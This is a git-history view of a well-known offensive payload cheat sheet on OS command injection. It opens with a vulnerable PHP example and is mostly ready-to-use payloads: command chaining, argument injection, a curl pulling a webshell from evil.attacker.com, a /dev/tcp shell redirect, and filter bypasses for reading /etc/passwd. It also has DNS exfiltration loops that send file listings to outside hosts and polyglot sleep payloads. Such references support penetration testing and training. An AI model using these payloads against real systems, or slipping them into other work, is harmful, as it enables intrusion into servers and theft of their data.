PayloadsAllTheThings/Command Injection/README.md

449 lines
14 KiB
Markdown
Raw Permalink Normal View History

# Command Injection
2019-04-21 17:50:50 +00:00
> Command injection is a security vulnerability that allows an attacker to execute arbitrary commands inside a vulnerable application.
2019-04-21 17:50:50 +00:00
## Summary
* [Tools](#tools)
* [Exploits](#exploits)
* [Basic commands](#basic-commands)
* [Chaining commands](#chaining-commands)
* [Argument injection](#argument-injection)
* [Inside a command](#inside-a-command)
2019-04-21 17:50:50 +00:00
* [Filter Bypasses](#filter-bypasses)
* [Bypass without space](#bypass-without-space)
* [Bypass with a line return](#bypass-with-a-line-return)
* [Bypass with backslash newline](#bypass-with-backslash-newline)
* [Bypass characters filter via hex encoding](#bypass-characters-filter-via-hex-encoding)
* [Bypass with Tilde expansion](#bypass-with-tilde-expansion)
* [Bypass with Brace expansion](#bypass-with-brace-expansion)
* [Bypass characters filter](#bypass-characters-filter)
* [Bypass blacklisted words](#bypass-blacklisted-words)
* [Bypass with single quote](#bypass-with-single-quote)
* [Bypass with double quote](#bypass-with-double-quote)
* [Bypass with backticks](#bypass-with-backticks)
* [Bypass with backslash and slash](#bypass-with-backslash-and-slash)
* [Bypass with $@](#bypass-with-)
* [Bypass with $()](#bypass-with--1)
* [Bypass with variable expansion](#bypass-with-variable-expansion)
* [Bypass with wildcards](#bypass-with-wildcards)
2023-09-21 11:09:57 +00:00
* [Data Exfiltration](#data-exfiltration)
* [Time based data exfiltration](#time-based-data-exfiltration)
* [DNS based data exfiltration](#dns-based-data-exfiltration)
2023-12-14 13:38:39 +00:00
* [Polyglot Command Injection](#polyglot-command-injection)
2023-09-21 11:09:57 +00:00
* [Tricks](#tricks)
* [Backgrounding long running commands](#backgrounding-long-running-commands)
* [Remove arguments after the injection](#remove-arguments-after-the-injection)
2023-09-21 11:09:57 +00:00
* [Labs](#labs)
* [Challenge](#challenge)
2019-04-21 17:50:50 +00:00
* [References](#references)
2023-09-21 11:09:57 +00:00
2019-04-21 17:50:50 +00:00
## Tools
2023-09-21 11:09:57 +00:00
* [commixproject/commix](https://github.com/commixproject/commix) - Automated All-in-One OS command injection and exploitation tool
* [projectdiscovery/interactsh](https://github.com/projectdiscovery/interactsh) - An OOB interaction gathering server and client library
2016-10-18 08:01:56 +00:00
2016-10-18 06:39:17 +00:00
## Exploits
2018-08-12 21:30:22 +00:00
2023-09-21 11:09:57 +00:00
Command injection, also known as shell injection, is a type of attack in which the attacker can execute arbitrary commands on the host operating system via a vulnerable application. This vulnerability can exist when an application passes unsafe user-supplied data (forms, cookies, HTTP headers, etc.) to a system shell. In this context, the system shell is a command-line interface that processes commands to be executed, typically on a Unix or Linux system.
The danger of command injection is that it can allow an attacker to execute any command on the system, potentially leading to full system compromise.
**Example of Command Injection with PHP**:
Suppose you have a PHP script that takes a user input to ping a specified IP address or domain:
```php
<?php
$ip = $_GET['ip'];
system("ping -c 4 " . $ip);
?>
```
In the above code, the PHP script uses the `system()` function to execute the `ping` command with the IP address or domain provided by the user through the `ip` GET parameter.
If an attacker provides input like `8.8.8.8; cat /etc/passwd`, the actual command that gets executed would be: `ping -c 4 8.8.8.8; cat /etc/passwd`.
This means the system would first `ping 8.8.8.8` and then execute the `cat /etc/passwd` command, which would display the contents of the `/etc/passwd` file, potentially revealing sensitive information.
2019-04-21 17:50:50 +00:00
### Basic commands
Execute the command and voila :p
2018-08-12 21:30:22 +00:00
```powershell
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
2016-10-18 06:04:50 +00:00
sys:x:3:3:sys:/dev:/bin/sh
2023-09-21 11:09:57 +00:00
...
2016-10-18 06:02:14 +00:00
```
2022-10-22 03:46:29 +00:00
2023-09-21 11:09:57 +00:00
### Chaining commands
2023-09-21 11:09:57 +00:00
In many command-line interfaces, especially Unix-like systems, there are several characters that can be used to chain or manipulate commands.
2019-04-21 17:50:50 +00:00
2023-09-21 11:09:57 +00:00
* `;` (Semicolon): Allows you to execute multiple commands sequentially.
* `&&` (AND): Execute the second command only if the first command succeeds (returns a zero exit status).
* `||` (OR): Execute the second command only if the first command fails (returns a non-zero exit status).
* `&` (Background): Execute the command in the background, allowing the user to continue using the shell.
* `|` (Pipe): Takes the output of the first command and uses it as the input for the second command.
2018-08-12 21:30:22 +00:00
```powershell
2023-09-21 11:09:57 +00:00
command1; command2 # Execute command1 and then command2
command1 && command2 # Execute command2 only if command1 succeeds
command1 || command2 # Execute command2 only if command1 fails
command1 & command2 # Execute command1 in the background
command1 | command2 # Pipe the output of command1 into command2
```
2016-12-20 18:46:06 +00:00
2023-12-14 13:38:39 +00:00
### Argument Injection
Gain a command execution when you can only append arguments to an existing command.
Use this website [Argument Injection Vectors - Sonar](https://sonarsource.github.io/argument-injection-vectors/) to find the argument to inject to gain command execution.
* Chrome
```ps1
chrome '--gpu-launcher="id>/tmp/foo"'
```
* SSH
```ps1
ssh '-oProxyCommand="touch /tmp/foo"' foo@foo
```
* psql
```ps1
psql -o'|id>/tmp/foo'
```
Sometimes, direct command execution from the injection might not be possible, but you may be able to redirect the flow into a specific file, enabling you to deploy a web shell.
* curl
```ps1
# -o, --output <file> Write to file instead of stdout
curl http://evil.attacker.com/ -o webshell.php
```
2023-12-14 13:38:39 +00:00
2023-09-21 11:09:57 +00:00
### Inside a command
2016-10-18 08:01:56 +00:00
2023-09-21 11:09:57 +00:00
* Command injection using backticks.
```bash
original_cmd_by_server `cat /etc/passwd`
```
* Command injection using substitution
```bash
original_cmd_by_server $(cat /etc/passwd)
```
2018-08-12 21:30:22 +00:00
2023-09-21 11:09:57 +00:00
## Filter Bypasses
2022-01-15 00:39:52 +00:00
2023-09-21 11:09:57 +00:00
### Bypass without space
2022-01-15 00:39:52 +00:00
2024-09-16 16:05:54 +00:00
* `$IFS` is a special shell variable called the Internal Field Separator. By default, in many shells, it contains whitespace characters (space, tab, newline). When used in a command, the shell will interpret `$IFS` as a space. `$IFS` does not directly work as a separator in commands like `ls`, `wget`; use `${IFS}` instead.
2023-09-21 11:09:57 +00:00
```powershell
cat${IFS}/etc/passwd
ls${IFS}-la
2023-09-21 11:09:57 +00:00
```
* In some shells, brace expansion generates arbitrary strings. When executed, the shell will treat the items inside the braces as separate commands or arguments.
```powershell
{cat,/etc/passwd}
```
* Input redirection. The < character tells the shell to read the contents of the file specified.
```powershell
cat</etc/passwd
sh</dev/tcp/127.0.0.1/4242
```
* ANSI-C Quoting
```powershell
X=$'uname\x20-a'&&$X
```
* The tab character can sometimes be used as an alternative to spaces. In ASCII, the tab character is represented by the hexadecimal value `09`.
```powershell
;ls%09-al%09/home
```
* In Windows, `%VARIABLE:~start,length%` is a syntax used for substring operations on environment variables.
```powershell
ping%CommonProgramFiles:~10,-18%127.0.0.1
ping%PROGRAMFILES:~10,-5%127.0.0.1
```
2018-08-12 21:30:22 +00:00
2017-08-13 14:35:12 +00:00
2019-04-21 17:50:50 +00:00
### Bypass with a line return
2018-08-12 21:30:22 +00:00
2023-09-21 11:09:57 +00:00
Commands can also be run in sequence with newlines
2022-01-15 00:39:52 +00:00
2023-09-21 11:09:57 +00:00
```bash
original_cmd_by_server
ls
2022-01-15 00:39:52 +00:00
```
2023-09-21 11:09:57 +00:00
2022-11-06 11:28:26 +00:00
### Bypass with backslash newline
2023-09-21 11:09:57 +00:00
* Commands can be broken into parts by using backslash followed by a newline
```powershell
$ cat /et\
c/pa\
sswd
```
* URL encoded form would look like this:
```powershell
cat%20/et%5C%0Ac/pa%5C%0Asswd
```
2023-09-21 11:09:57 +00:00
### Bypass characters filter via hex encoding
2020-05-24 12:09:46 +00:00
```powershell
swissky@crashlab:~$ echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
/etc/passwd
swissky@crashlab:~$ cat `echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"`
root:x:0:0:root:/root:/bin/bash
swissky@crashlab:~$ abc=$'\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64';cat $abc
root:x:0:0:root:/root:/bin/bash
swissky@crashlab:~$ `echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'`
root:x:0:0:root:/root:/bin/bash
swissky@crashlab:~$ xxd -r -p <<< 2f6574632f706173737764
/etc/passwd
swissky@crashlab:~$ cat `xxd -r -p <<< 2f6574632f706173737764`
root:x:0:0:root:/root:/bin/bash
swissky@crashlab:~$ xxd -r -ps <(echo 2f6574632f706173737764)
/etc/passwd
swissky@crashlab:~$ cat `xxd -r -ps <(echo 2f6574632f706173737764)`
root:x:0:0:root:/root:/bin/bash
```
2024-07-15 06:28:02 +00:00
### Bypass with Tilde expansion
```powershell
echo ~+
echo ~-
```
2023-09-21 11:09:57 +00:00
2024-07-25 06:27:43 +00:00
### Bypass with Brace expansion
```powershell
{,ip,a}
{,ifconfig}
{,ifconfig,eth0}
{l,-lh}s
2024-09-17 16:59:37 +00:00
{,echo,#test}
{,$"whoami",}
{,/?s?/?i?/c?t,/e??/p??s??,}
2024-07-25 06:27:43 +00:00
```
2023-09-21 11:09:57 +00:00
### Bypass characters filter
Commands execution without backslash and slash - linux bash
2020-05-24 12:09:46 +00:00
```powershell
swissky@crashlab:~$ echo ${HOME:0:1}
/
swissky@crashlab:~$ cat ${HOME:0:1}etc${HOME:0:1}passwd
root:x:0:0:root:/root:/bin/bash
swissky@crashlab:~$ echo . | tr '!-0' '"-1'
/
swissky@crashlab:~$ tr '!-0' '"-1' <<< .
/
swissky@crashlab:~$ cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
root:x:0:0:root:/root:/bin/bash
```
2023-09-21 11:09:57 +00:00
2019-04-21 17:50:50 +00:00
### Bypass Blacklisted words
#### Bypass with single quote
2018-08-12 21:30:22 +00:00
```powershell
w'h'o'am'i
2024-03-09 16:16:33 +00:00
wh''oami
2024-09-06 13:39:46 +00:00
'w'hoami
```
2019-04-21 17:50:50 +00:00
#### Bypass with double quote
2018-08-12 21:30:22 +00:00
```powershell
w"h"o"am"i
2024-03-09 16:16:33 +00:00
wh""oami
2024-09-06 13:39:46 +00:00
"wh"oami
2024-03-09 16:16:33 +00:00
```
#### Bypass with backticks
```powershell
wh``oami
```
2019-04-21 17:50:50 +00:00
#### Bypass with backslash and slash
2018-08-12 21:30:22 +00:00
```powershell
2018-08-12 21:30:22 +00:00
w\ho\am\i
/\b\i\n/////s\h
```
2019-04-21 17:50:50 +00:00
#### Bypass with $@
2018-08-12 21:30:22 +00:00
2023-09-21 11:09:57 +00:00
`$0`: Refers to the name of the script if it's being run as a script. If you're in an interactive shell session, `$0` will typically give the name of the shell.
```powershell
who$@ami
2019-04-21 17:50:50 +00:00
echo whoami|$0
```
2023-09-21 11:09:57 +00:00
2023-09-25 12:15:48 +00:00
#### Bypass with $()
2023-09-21 11:09:57 +00:00
2022-03-30 07:13:18 +00:00
```powershell
who$()ami
who$(echo am)i
2022-03-30 07:16:37 +00:00
who`echo am`i
2022-03-30 07:13:18 +00:00
```
2019-04-21 17:50:50 +00:00
#### Bypass with variable expansion
2018-08-12 21:30:22 +00:00
```powershell
/???/??t /???/p??s??
2018-08-12 21:30:22 +00:00
test=/ehhh/hmtc/pahhh/hmsswd
cat ${test//hhh\/hm/}
cat ${test//hh??hm/}
```
2019-04-21 17:50:50 +00:00
#### Bypass with wildcards
```powershell
powershell C:\*\*2\n??e*d.*? # notepad
@^p^o^w^e^r^shell c:\*\*32\c*?c.e?e # calc
```
2018-08-12 21:30:22 +00:00
2023-09-21 11:09:57 +00:00
## Data Exfiltration
2023-09-21 11:09:57 +00:00
### Time based data exfiltration
2018-08-12 21:30:22 +00:00
2017-03-03 20:41:00 +00:00
Extracting data : char by char
2018-08-12 21:30:22 +00:00
```powershell
swissky@crashlab:~$ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
2018-08-12 21:30:22 +00:00
real 0m5.007s
user 0m0.000s
sys 0m0.000s
2017-03-03 20:41:00 +00:00
swissky@crashlab:~$ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
2018-08-12 21:30:22 +00:00
real 0m0.002s
user 0m0.000s
sys 0m0.000s
2017-03-03 20:41:00 +00:00
```
2023-09-21 11:09:57 +00:00
### DNS based data exfiltration
2018-08-12 21:30:22 +00:00
Based on the tool from `https://github.com/HoLyVieR/dnsbin` also hosted at dnsbin.zhack.ca
```powershell
1. Go to http://dnsbin.zhack.ca/
2. Execute a simple 'ls'
2019-05-07 16:14:49 +00:00
for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done
```
```powershell
$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)
```
2018-12-25 11:08:32 +00:00
Online tools to check for DNS based data exfiltration:
- dnsbin.zhack.ca
- pingb.in
2023-09-21 11:09:57 +00:00
2023-12-14 13:38:39 +00:00
## Polyglot Command Injection
2023-09-21 11:09:57 +00:00
A polyglot is a piece of code that is valid and executable in multiple programming languages or environments simultaneously. When we talk about "polyglot command injection," we're referring to an injection payload that can be executed in multiple contexts or environments.
2023-09-21 11:09:57 +00:00
* Example 1:
```powershell
Payload: 1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
2023-09-21 11:09:57 +00:00
# Context inside commands with single and double quote:
echo 1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
echo '1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
echo "1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
```
* Example 2:
```powershell
Payload: /*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
2023-09-21 11:09:57 +00:00
# Context inside commands with single and double quote:
echo 1/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
echo "YOURCMD/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/"
echo 'YOURCMD/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/'
```
2023-09-21 11:09:57 +00:00
## Tricks
2023-09-21 11:09:57 +00:00
### Backgrounding long running commands
In some instances, you might have a long running command that gets killed by the process injecting it timing out.
Using `nohup`, you can keep the process running after the parent process exits.
```bash
nohup sleep 120 > /dev/null &
```
2023-09-21 11:09:57 +00:00
### Remove arguments after the injection
In Unix-like command-line interfaces, the `--` symbol is used to signify the end of command options. After `--`, all arguments are treated as filenames and arguments, and not as options.
2022-10-05 07:20:10 +00:00
## Labs
* [PortSwigger - OS command injection, simple case](https://portswigger.net/web-security/os-command-injection/lab-simple)
* [PortSwigger - Blind OS command injection with time delays](https://portswigger.net/web-security/os-command-injection/lab-blind-time-delays)
* [PortSwigger - Blind OS command injection with output redirection](https://portswigger.net/web-security/os-command-injection/lab-blind-output-redirection)
* [PortSwigger - Blind OS command injection with out-of-band interaction](https://portswigger.net/web-security/os-command-injection/lab-blind-out-of-band)
* [PortSwigger - Blind OS command injection with out-of-band data exfiltration](https://portswigger.net/web-security/os-command-injection/lab-blind-out-of-band-data-exfiltration)
2022-10-05 07:20:10 +00:00
2023-09-21 11:09:57 +00:00
### Challenge
2023-09-21 11:09:57 +00:00
Challenge based on the previous tricks, what does the following command do:
```powershell
g="/e"\h"hh"/hm"t"c/\i"sh"hh/hmsu\e;tac$@<${g//hh??hm/}
```
**NOTE**: The command is safe to run, but you should not trust me.
2023-09-21 11:09:57 +00:00
2018-12-24 14:02:50 +00:00
## References
2018-08-12 21:30:22 +00:00
- [Argument Injection and Getting Past Shellwords.escape - Etienne Stalmans - November 24, 2019](https://staaldraad.github.io/post/2019-11-24-argument-injection/)
- [Argument Injection Vectors - SonarSource - February 21, 2023](https://sonarsource.github.io/argument-injection-vectors/)
- [Back to the Future: Unix Wildcards Gone Wild - Leon Juranic - June 25, 2014](https://www.exploit-db.com/papers/33930)
- [Bash Obfuscation by String Manipulation - Malwrologist, @DissectMalware - August 4, 2018](https://twitter.com/DissectMalware/status/1025604382644232192)
- [Bug Bounty Survey - Windows RCE Spaceless - Bug Bounties Survey - May 4, 2017](https://web.archive.org/web/20180808181450/https://twitter.com/bugbsurveys/status/860102244171227136)
- [No PHP, No Spaces, No $, No {}, Bash Only - Sven Morgenroth - August 9, 2017](https://twitter.com/asdizzle_/status/895244943526170628)
- [OS Command Injection - PortSwigger - 2024](https://portswigger.net/web-security/os-command-injection)
- [SECURITY CAFÉ - Exploiting Timed-Based RCE - Pobereznicenco Dan - February 28, 2017](https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/)
- [TL;DR: How to Exploit/Bypass/Use PHP escapeshellarg/escapeshellcmd Functions - kacperszurek - April 25, 2018](https://github.com/kacperszurek/exploits/blob/master/GitList/exploit-bypass-php-escapeshellarg-escapeshellcmd.md)